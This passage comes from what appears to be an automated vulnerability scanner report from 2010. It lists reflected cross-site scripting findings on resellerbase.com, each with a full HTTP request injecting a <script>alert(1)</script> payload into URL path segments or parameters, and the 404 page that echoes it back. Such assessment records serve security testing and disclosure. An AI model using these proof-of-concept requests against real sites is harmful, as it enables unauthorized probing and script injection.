<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search&opt=2&ccddc<script>alert(1)</script>810402765d4=1 was not found on this server.</p>
...[SNIP]...

2.2452. http://www.resellerbase.com/detail/36/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/36/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload acb3e<a>c49b25cb185 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/36/search.php?keyword=search...&Submit3=Search&opt=2acb3e<a>c49b25cb185 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/36/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/search.php?keyword=search...&Submit3=Search&opt=2acb3e<a>c49b25cb185 was not found on this server.</p>
...[SNIP]...

2.2453. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71156<script>alert(1)</script>e433f943718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail71156<script>alert(1)</script>e433f943718/36/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail71156<script>alert(1)</script>e433f943718/36/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2454. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd9f5<script>alert(1)</script>835cc133685 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36dd9f5<script>alert(1)</script>835cc133685/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36dd9f5<script>alert(1)</script>835cc133685/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2455. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload be077<script>alert(1)</script>c6deef339be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themesbe077<script>alert(1)</script>c6deef339be/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themesbe077<script>alert(1)</script>c6deef339be/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2456. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fe07<script>alert(1)</script>5687c7616c1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos4fe07<script>alert(1)</script>5687c7616c1/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos4fe07<script>alert(1)</script>5687c7616c1/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2457. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad179<script>alert(1)</script>070a9b34b9d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/imagesad179<script>alert(1)</script>070a9b34b9d/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/imagesad179<script>alert(1)</script>070a9b34b9d/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.2458. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cec4<script>alert(1)</script>6cfa2006af7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating6cec4<script>alert(1)</script>6cfa2006af7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating6cec4<script>alert(1)</script>6cfa2006af7/0.gif was not found on this server.</p>
...[SNIP]...

2.2459. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4ec74<script>alert(1)</script>33fa16cd841 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating/0.gif4ec74<script>alert(1)</script>33fa16cd841 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating/0.gif4ec74<script>alert(1)</script>33fa16cd841 was not found on this server.</p>
...[SNIP]...

2.2460. http://www.resellerbase.com/detail/36/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/36/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62f93<script>alert(1)</script>4339d342efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/36/themes/kosmos/images/rating/0.gif?62f93<script>alert(1)</script>4339d342efd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/36/themes/kosmos/images/rating/0.gif?62f93<script>alert(1)</script>4339d342efd=1 was not found on this server.</p>
...[SNIP]...

2.2461. http://www.resellerbase.com/detail/37/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67183<script>alert(1)</script>584f0c36064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail67183<script>alert(1)</script>584f0c36064/37/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail67183<script>alert(1)</script>584f0c36064/37/ was not found on this server.</p>
...[SNIP]...

2.2462. http://www.resellerbase.com/detail/37/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 73b16<script>alert(1)</script>cb84df5cdbc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3773b16<script>alert(1)</script>cb84df5cdbc/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3773b16<script>alert(1)</script>cb84df5cdbc/ was not found on this server.</p>
...[SNIP]...

2.2463. http://www.resellerbase.com/detail/37/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8cfe5<script>alert(1)</script>d18e9a2de3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/?8cfe5<script>alert(1)</script>d18e9a2de3b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/?8cfe5<script>alert(1)</script>d18e9a2de3b=1 was not found on this server.</p>
...[SNIP]...

2.2464. http://www.resellerbase.com/detail/37/neondollars-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/neondollars-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8d4e<script>alert(1)</script>4296fc59fbe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8d4e<script>alert(1)</script>4296fc59fbe/37/neondollars-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf8d4e<script>alert(1)</script>4296fc59fbe/37/neondollars-com.html was not found on this server.</p>
...[SNIP]...

2.2465. http://www.resellerbase.com/detail/37/neondollars-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/neondollars-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3ed29<script>alert(1)</script>81e14efb85a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/3ed29<script>alert(1)</script>81e14efb85a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/3ed29<script>alert(1)</script>81e14efb85a was not found on this server.</p>
...[SNIP]...

2.2466. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50261<script>alert(1)</script>4ff259c321f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail50261<script>alert(1)</script>4ff259c321f/37/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail50261<script>alert(1)</script>4ff259c321f/37/rating.php was not found on this server.</p>
...[SNIP]...

2.2467. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3f947<script>alert(1)</script>5613e7656dec004e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail3f947<script>alert(1)</script>5613e7656dec004e/37/rating.php?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3f947<script>alert(1)</script>5613e7656dec004e/37/rating.php?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2468. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8858c<script>alert(1)</script>67d85bf080f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/378858c<script>alert(1)</script>67d85bf080f/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/378858c<script>alert(1)</script>67d85bf080f/rating.php was not found on this server.</p>
...[SNIP]...

2.2469. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 275ca<script>alert(1)</script>2b31dc069f3600329 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/37275ca<script>alert(1)</script>2b31dc069f3600329/rating.php?id=37&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37275ca<script>alert(1)</script>2b31dc069f3600329/rating.php?id=37&rating=5 was not found on this server.</p>
...[SNIP]...

2.2470. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b825e<script>alert(1)</script>927a49be0ba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/37/rating.phpb825e<script>alert(1)</script>927a49be0ba HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/37/rating.phpb825e<script>alert(1)</script>927a49be0ba was not found on this server.</p>
...[SNIP]...

2.2471. http://www.resellerbase.com/detail/37/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/37/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6cf5e<script>alert(1)</script>34702f2cd0121c68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

